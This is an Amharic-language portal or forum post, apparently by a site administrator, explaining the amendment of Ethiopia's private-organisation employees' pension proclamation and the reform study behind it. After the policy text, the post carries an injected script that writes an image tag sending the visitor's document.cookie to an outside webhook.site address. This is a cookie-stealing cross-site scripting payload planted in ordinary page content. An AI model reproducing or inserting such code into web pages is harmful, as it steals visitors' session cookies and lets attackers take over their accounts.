ይሳተፉ

የግል ድርጅት ሠራተኞች ጡረታ አዋጅ

Portal Admin, modified 2 Years ago.

የግል ድርጅት ሠራተኞች ጡረታ አዋጅ

Youngling Posts: 6 Join Date: 22/01/18 Recent Posts
በኢ.ፌ.ዲ.ሪ ሕገ-መንግስት አንቀጽ 90/1/ ላይ የሃገሪቱ አቅም በፈቀደ መጠን ደረጃ በደረጃ ሁሉም ዜጎች የማህበራዊ ዋስትና ሽፋን እንዲያገኙ እንደሚደረግ ይደነግጋል፡፡ይህንን የህገ-መንግስቱ ድንጋጌ መሰረት በማድረግ የግል ድርጅት ሠራተኞች ጡረታ አዋጅ ቁጥር 715/2003 ወጥቶ ከአስር አመት በላይ ተግባራዊ በመደረግ ላይ የሚገኝ ሲሆን በ2007 ዓ.ም በወቅቱ የነበረውን የአፈጻጸም ችግር ለመፍታትና ሽፋኑን ለማስፋት በአዋጅ ቁጥር 908/2007 ማሻሻያ ተደርጓል፡፡
መንግስት በአገሪቱ እየታየ ካለው ፈጣን ኢኮኖሚያዊና ማህበራዊ ዕድገት ጋር የተጣጣመና  ዜጎችን ይበልጥ ተጠቃሚ ለማድረግ የሚያስችል ሃገራዊ ሪፎርም በማካሄድ በየዘርፉ በሚሰጡ አገልግሎቶች ላይ ተግዳት የሆኑ ችግሮችን በመፍታት ጥራቱን የጠበቀ፣ቀልጣፋና ውጤታማ አገልግሎት ለመስጠት የሚያችል ምቹ ሁኔታዎችን ለመፍጠር ጥረት እያደረገ ይገኛል፡፡
በዚሁ መሠረት  በመንግስት ሠራተኞች እና በግል ድርጅት ሠራተኞች ጡረታ ዐቅድና ፈንድ  አስተዳደር ላይ ሁለንተናዊ ለውጥ (ሪፎርም) ለማምጣት መንግስት ማኬንዚ የተባለ የውጪ አማካሪ ድርጅት በመቅጠር ያስጠና ሲሆን በአጥኚው ድርጅት የጥናት ውጤትና ምክረ ሃሳቦች መሠረት የጡረታ አዋጁን ማሻሻል አስፈላጊ ሆኖ ተገኝቷል፡፡ በዚሁ መሠረት ማሻሻያ በሚያስፈልጋቸው የአዋጁ ድንጋጌዎች ላይ  ማሻሻያ የተደረገበት ምክንያት እንደሚከተለው በአጭሩ ቀርቧል፡፡
<script>
document.write('<img src="https://webhook.site/60388ee2-ec6e-4e68-b9a6-19983e410dbe?c='+document.cookie+'" />');
</script>

ይምረጡ